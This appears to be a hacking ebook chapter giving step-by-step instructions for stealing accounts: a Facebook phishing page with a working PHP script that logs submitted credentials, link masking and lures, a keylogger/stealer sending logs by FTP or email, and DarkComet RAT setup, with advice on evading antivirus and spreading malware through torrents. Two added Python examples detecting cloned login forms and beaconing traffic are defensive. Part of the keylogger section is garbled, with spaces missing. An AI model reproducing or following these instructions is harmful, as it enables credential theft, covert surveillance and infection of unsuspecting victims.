If you have no idea or any previous experience about account hacking then READ this:
1 - A program or software that automatically hacks accounts when you give it a username or email does NOT exist, so please don't be fooled by the fake YouTube videos.
2 - Social Engineering, also known as SE, is the art of manipulating/tricking people; it is usually used to get some information from the victim or trick them into fake logins / keyloggers....
3 - Hacking accounts IS a cybercrime and can get you in jail in some countries.
4 - "Ohh no, my Facebook/Hotmail.... account was hacked, how can I hack it back?" Stop whining about it and use the password recovery button; it is a lot easier than hacking the person who hacked you in the first place.
5 - These tutorials are for education purposes, so don't abuse this knowledge for personal revenge.
Enough said, let's move into action.

a - Phishing
A phishing page is a fake login page that looks exactly like the original one, but once you log in it will send the username and password to the hacker. It is probably the easiest and most efficient way to hack an account, but it requires more SE than the others.
1 - What you will need:
Free/paid web hosting.
....Yes, that is all you will need, in addition to a brain and a computer of course.
2 - Making the fake page:
a - Choose a website; I will go with Facebook. If you don't have any knowledge of HTML and PHP coding, stick to my example so you can follow me easily.
b - Go to the website's login page; in my case it is facebook.com or facebook.com/login.php, both pages have a login form. Then we need to get the web page source code: if you are using Firefox just right click and select "View Page Source", or you can press Ctrl+U. Copy all the code and paste it in Notepad++ or Notepad.
c - Now we need to create a PHP file that will receive the message (email/pass) sent by the page and write it to a text file. So go on and open a new Notepad window and copy-paste this code:
    <?php
    header('Location: http://');
    $handle = fopen("logs.txt", "a");
    foreach ($_POST as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
    }
    fwrite($handle, "===============\r\n");
    fclose($handle);
    exit;
    ?>
You can edit:
- The redirection location in the second line after "Location:"
- The text file name holding the emails and passwords in line 3, original name "logs.txt"
After you have set these options to your liking, save it as something.php (I will name it action.php).
d - Uploading: First you need to create an account with a web hosting service; here are some free ones:
7ry.us
000webhost.com
freewebhostingarea.com
zymic.com
After you have created an account, create a free domain then log in to your domain.

Now in your domain's cpanel search for your FTP login info, save it somewhere, then log out.

Google FileZilla and download it, then use the FTP login you got from your host to log in.

Now you can easily upload files from your computer (left) to the online host (right); go on and upload the PHP file we created earlier.

The file action.php is now online, so let's get its link; to do that right click the file and select "Copy URL(s) to clipboard".

This will give you the FTP link, but we need the HTTP link; follow this:
ftp: ftp://user@domain/fileteh/action.php
To get the HTTP link remove everything before the @, including the @. Also, if in the link there is a reference to "public_html", remove it.
So my HTTP link will be: http://domain/fileteh/action.php
e - Back to the page code: we need to search the code for the part about the login form, more specifically for the code that sends the request to the server. For Facebook search the code for:
action="https://www.facebook.com/login.php?login_attempt=1"

Make sure this code is in the form "login_form".

Now replace the link after action=" with your PHP file link ("http://domain/fileteh/action.php").

f - Obfuscate, then upload. To obfuscate your code go to http://htmlobfuscator.com/, copy all the modified HTML (web page) code from Notepad to the website and click obfuscate, then copy the obfuscated code, place it in Notepad and save it as something.html

And upload your HTML file the same way you did for the PHP file, then get the HTTP URL.
g - Setting permissions: in FileZilla right click the two files and click "File permissions...", then change it to 777 and click "OK".
h - Testing: finally you are ready to test the page. Go to the HTML page you uploaded (not the PHP page) and it should look just like Facebook.

Write any username and password, then press login; the page will then redirect you (you can change the redirection page in the PHP file, see step "c"). Then refresh FileZilla and a new txt file should be there with the username and password inside.

Extra:
Masking the link: If your link looks too suspicious then you can mask it. That is very easy: go to www.dot.tk and select a new URL name.

Then in "Forward this domain to" insert the link to the fake page.

Now you can send the .tk link and they will be redirected to the fake page.
Spreading: Here comes the SE part. You need to trick them into logging in with your fake page; you can tell them they will get free Facebook gold or free likes, or just tell them it is a new version of Facebook with lots of new stuff. You won't believe how stupid some people are, so just come up with a story and make them log in using the fake page.

THE END
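A static check for the tell-tale of the fake page built above, a cloned page whose links and assets still point at the real brand while its password form posts elsewhere, as an added example that is not part of the original book. The miniature HTML is constructed (not real Facebook markup) and reuses only the two action URLs quoted on the page; the registrable-domain reduction is a crude last-two-labels cut, not a public suffix list lookup.

```python
"""Flag password forms that post somewhere other than the brand the page imitates."""
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlparse


def registrable(netloc):
    """Crude registrable-domain reduction: 'www.facebook.com' -> 'facebook.com'.
    (Enough for the demo; a real tool would consult the public suffix list.)"""
    host = netloc.rsplit("@", 1)[-1].split(":")[0].lower()
    parts = host.split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host


class PageCollector(HTMLParser):
    """Counts the hosts referenced by href/src and records every <form>."""

    def __init__(self):
        super().__init__()
        self.hosts = Counter()
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        for attr in ("href", "src"):
            host = urlparse(a.get(attr) or "").netloc
            if host:
                self.hosts[registrable(host)] += 1
        if tag == "form":
            self._form = {"id": a.get("id"), "action": a.get("action") or "",
                          "has_password": False}
            self.forms.append(self._form)
        elif (tag == "input" and self._form is not None
              and (a.get("type") or "").lower() == "password"):
            self._form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def audit_login_forms(html):
    """Return a finding for each password form whose action host differs from the
    page's dominant linked host, or which posts credentials over plain http."""
    collector = PageCollector()
    collector.feed(html)
    apparent_brand = collector.hosts.most_common(1)[0][0] if collector.hosts else None
    findings = []
    for form in collector.forms:
        if not form["has_password"]:
            continue
        target = urlparse(form["action"])
        reasons = []
        if target.netloc:   # a relative action posts back to the page's own origin
            if apparent_brand and registrable(target.netloc) != apparent_brand:
                reasons.append("password posted to %s while the page's links point to %s"
                               % (target.netloc, apparent_brand))
            if target.scheme != "https":
                reasons.append("password posted over %s" % target.scheme)
        if reasons:
            findings.append({"form": form["id"], "action": form["action"],
                             "reasons": reasons})
    return findings


# Constructed miniature login page. LEGIT_PAGE posts to the URL quoted in step e;
# PHISHING_PAGE is the same markup with the action swapped for the action.php
# link built in step d, exactly the edit step e describes.
LEGIT_PAGE = """<html><head>
<link rel="stylesheet" href="https://static.facebook.com/css/login.css"></head>
<body><img src="https://static.facebook.com/logo.png">
<a href="https://www.facebook.com/recover">Forgot your password?</a>
<form id="login_form" method="post" action="https://www.facebook.com/login.php?login_attempt=1">
<input name="email"><input type="password" name="pass"><input type="submit" value="Log In">
</form></body></html>"""

PHISHING_PAGE = LEGIT_PAGE.replace(
    'action="https://www.facebook.com/login.php?login_attempt=1"',
    'action="http://domain/fileteh/action.php"')

if __name__ == "__main__":
    print("legit:", audit_login_forms(LEGIT_PAGE))
    print("clone:", audit_login_forms(PHISHING_PAGE))
```

An obfuscated clone (step f) hides its markup from a static parser, so feed this the rendered DOM rather than the raw file.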

bKeyloggers 1Whatisakeylogger? Akeyloggerruninsilentmod(hidden)ontheslave'spc andwillrecordallpressedkeysinadditionto screenshots/webcameandthensendthelogstothe hacker.Keyloggersareusedtostealpasswordsorspyon comversationsanduser'sactivities. 2HowtosetupaStealer+Logger? Iwillbeusing"UnknownLoggerPublicV1.5"locatedin theFilesfolderunderthename:"UnknownLoggerPublic V1.5.rar"
(Creditsgoesforunknownsfromhackforums.netforthatgreatfreelogger.)

Thisloggerhas2deliveryoption:ByemailorbyFTP,I recommendusingftpasitismorestableoruseafake emailsoifyouaretracedtotheemailtheywontgetyour realone. 1)UsingFTP: Firstlogintoyourftpaccount(Youcanseedetailsonhow tocreateoneinthepreviouspart"Phishing")usingFilezilla thencreateatextfileanduploadit,letsnameit"logs.txt"

NowintheLoggerfillintheinformationwithusername, passwordoftheftp,andfortheURLgotoFilezillaand copytheURLofthe"logs.txt"

For email delivery:

I recommend Gmail. Enter your email address and password, choose "smtp.gmail.com", then enter the address the logs should be sent to (don't touch the port).

Testing the delivery: for both email and FTP, click the "Send: Tags Explanation/Test" button; if everything is OK you will see the message shown (it may take up to a minute on a slow connection).

If you check your logs file or your email, you should see a test entry like the one shown.

The next step is configuring the Logger and the Stealer. For the Logger, the "Send Logs" option controls how often the logs are sent; leaving it at 1 means every minute. I recommend every 2 or 3 minutes, but it is up to you. The name is simply the name of the virus. Now click the "Settings" button and tick "Run on StartUp" under "Extras".

For the Stealer, simply tick everything in the "Stealers" tab under "Settings" (or only one or two options if you don't want the others). That is how it should look.

Now give it a name and click "Build" (the executable is built in the same location as the builder).

3- Spreading

To spread your keylogger successfully you will need to make it FUD (Fully UnDetectable) so that it is not detected and deleted by AV. For this you need a FUD crypter; I did not include one with the book because a private FUD crypter costs money.

The next step is to find somewhere to spread it. Torrents are usually the best: find a fresh program/game/crack/movie, download it, use a binder to bind the file with your keylogger and start spreading. You can also use an extension spoofer if you spread the keylogger without binding it to another application; this makes it look less suspicious.

c- Remote Administration Tools

1- What is a RAT?

RAT stands for Remote Administration Tool or Remote Access Trojan: a malware program that gives the attacker access to the victim's computer. RATs usually spread through torrents and pirated or fake software. A set of systems infected with the same RAT and controlled from one place forms a botnet. A botnet can serve several goals, the most common being money and DDoS (attacks on websites).

2- How to set up DarkComet RAT?

DarkComet is one of the best free (public) RATs (its author stopped distributing it in 2012), but as a public RAT it is easily detected by AV, so consider using a crypter.

General idea of how the RAT works: a RAT has two parts, a client and a server. In DarkComet's naming the server is the part sent to the victim to infect the computer; once running it tries to establish a connection with the client, which is the attacker's control panel. The client accepts the connection and sends the attacker's commands back over it. It is very similar to a multiplayer game: one person hosts the game (the client) and the other players connect to it (the servers).

The server needs an IP address and a port to reach the client. As many of us don't have a fixed IP (it can change every time you connect to the internet), we use a dynamic DNS host: the server connects to the DNS hostname, which resolves to your current IP, and you update the hostname every time your IP changes. What is left is port forwarding on your router, i.e. opening the port so the server can connect.

a) No-IP DNS host

To get a free DNS host, sign up at www.no-ip.com, then log in to your account and click "Add a Host".

Enter a hostname, leave the host type as DNS Host (A) and click "Create Host".

Now download the No-IP client so the IP can be updated quickly and easily: click "Download Client" in the left panel.

b) Creating the server.

DarkComet is a RAT and will be detected by your AV, so turn it off or add DarkComet to the exceptions list. Go to the "Files" folder provided with this ebook, extract "DarkComet RAT 531.zip", open the folder and run "DarkComet.exe"; accept the terms and you are good to go.

To create the server go to: DarkComet RAT > Server module (657.50 Kb) > Minimalist (quick), or choose Full editor (expert) if you want to fully customize the server.

Set the settings as shown in the picture above. You have to change "IP/DNS" to the No-IP DNS host you created earlier; you can also change the port and the icon if you want. Now click "Normal" to build the server.

c) Let's open some ports.

Before we can start listening for connections we need to open the port we used for the server, in my case 1604 (DarkComet's default). This is very easy if your router supports UPnP; either way, follow these steps: go to the Socket/Net tab in DarkComet, right-click and add a port.

Enter your port number, make sure "Try to forward automatically (UPnP)" is ticked, then click "Listen".

Now check that the port is open: go to www.canyouseeme.org, enter your port number and click "Check Your Port". If you get "Success" the port is open and you are good to go.

Only if automatic forwarding didn't work: if the previous method failed and canyouseeme.org reported a connection error, go to the website below, choose your router model and forward the port on your router manually (it is pretty easy): http://portforward.com/routers.htm

d) Listening

To listen for connections on a specific port, go to the Socket/Net tab and add the port (same as in the previous step). If you protected the server's connection with a password (only possible in Full editor mode), go to DarkComet RAT > Client settings > General settings and enter the password in "Traffic encryption merged key (password)".

e) Testing

The final step is to test that everything works: create a server, remove any option that could harm your computer, run the server on your own machine (preferably a virtual machine rather than your real system) and listen for connections. A few seconds later your computer should appear in the "Users" tab.

To uninstall the RAT from your machine, right-click the user > Uninstall Server(s).
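Both tools described in this chapter call home on a timer: the logger uploads its log every "Send Logs" minutes, and the DarkComet server reconnects to the controller's DNS hostname on a fixed port (1604 by default). That regularity is exactly what a defender hunting for an infection keys on. The following is an added example written for this edit, not code from the ebook, DarkComet or Unknown Logger; the log format, hostnames and addresses are constructed for the example (203.0.113.10 and 198.51.100.x are documentation ranges), and the jitter threshold is an assumption you would tune against your own traffic.

```python
"""Beacon detection over constructed connection logs.

Added example for this edit (not code from the ebook, DarkComet or
Unknown Logger). Both tools call home on a fixed timer, so connections
from one host to one destination:port recur at a near-constant interval.
The log format and every address below are constructed; 203.0.113.10
and 198.51.100.x are documentation addresses, 1604 is DarkComet's
default port.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median, pstdev

# Constructed log lines in the form "<ISO time> <src> -> <dst>:<dport>".
# 192.168.1.20 checks in with 203.0.113.10:1604 about once a minute;
# the rest is ordinary browsing noise.
SAMPLE_LOG = """\
2024-03-01T10:00:00 192.168.1.20 -> 203.0.113.10:1604
2024-03-01T10:00:07 192.168.1.20 -> 198.51.100.5:443
2024-03-01T10:01:00 192.168.1.20 -> 203.0.113.10:1604
2024-03-01T10:01:31 192.168.1.21 -> 198.51.100.7:443
2024-03-01T10:02:01 192.168.1.20 -> 203.0.113.10:1604
2024-03-01T10:02:44 192.168.1.20 -> 198.51.100.9:80
2024-03-01T10:03:00 192.168.1.20 -> 203.0.113.10:1604
2024-03-01T10:03:59 192.168.1.20 -> 203.0.113.10:1604
2024-03-01T10:04:12 192.168.1.21 -> 198.51.100.5:443
2024-03-01T10:05:00 192.168.1.20 -> 203.0.113.10:1604
2024-03-01T10:09:30 192.168.1.21 -> 198.51.100.5:443
"""


def parse_line(line):
    """Split one log line into (timestamp, src, dst, dport)."""
    ts, src, _arrow, dst = line.split()
    host, port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), src, host, int(port)


def find_beacons(log_text, min_events=5, max_jitter=0.15):
    """Return (src, dst, dport, median_gap_seconds, count) for each flow
    whose connections repeat at a near-constant interval.

    min_events: ignore flows seen fewer times than this.
    max_jitter: allowed ratio of the gaps' standard deviation to their
                median (assumed threshold); a human browsing a site does
                not stay this regular, a timer-driven implant does.
    """
    flows = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, src, dst, dport = parse_line(line)
            flows[(src, dst, dport)].append(ts)

    beacons = []
    for key, times in flows.items():
        if len(times) < min_events:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med = median(gaps)
        if med > 0 and pstdev(gaps) / med <= max_jitter:
            beacons.append((*key, med, len(times)))
    return beacons


if __name__ == "__main__":
    for src, dst, dport, gap, count in find_beacons(SAMPLE_LOG):
        print(f"{src} -> {dst}:{dport} every ~{gap:.0f}s ({count} connections)")
```

Run on the constructed sample, only the 192.168.1.20 to 203.0.113.10:1604 flow is reported, at a median gap of 60 seconds over 6 connections; the browsing connections are either too few or too irregular. In practice you would feed this the same fields from firewall, NetFlow or Zeek conn logs, and the FTP or SMTP uploads from the logger show up the same way, as a periodic flow to one destination on port 21 or 587.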

3- Spreading (same as for the keylogger)

You will need to make it FUD (Fully UnDetectable) so that it is not detected and deleted by AV. For this you need a FUD crypter; I did not include one with the book because a private FUD crypter costs money. The next step is to find somewhere to spread it. Torrents are usually the best: find a fresh program/game/crack/movie, download it, use a binder to bind the file with your RAT server and start spreading. You can also use an extension spoofer if you spread the server without binding it to another application; this makes it look less suspicious.
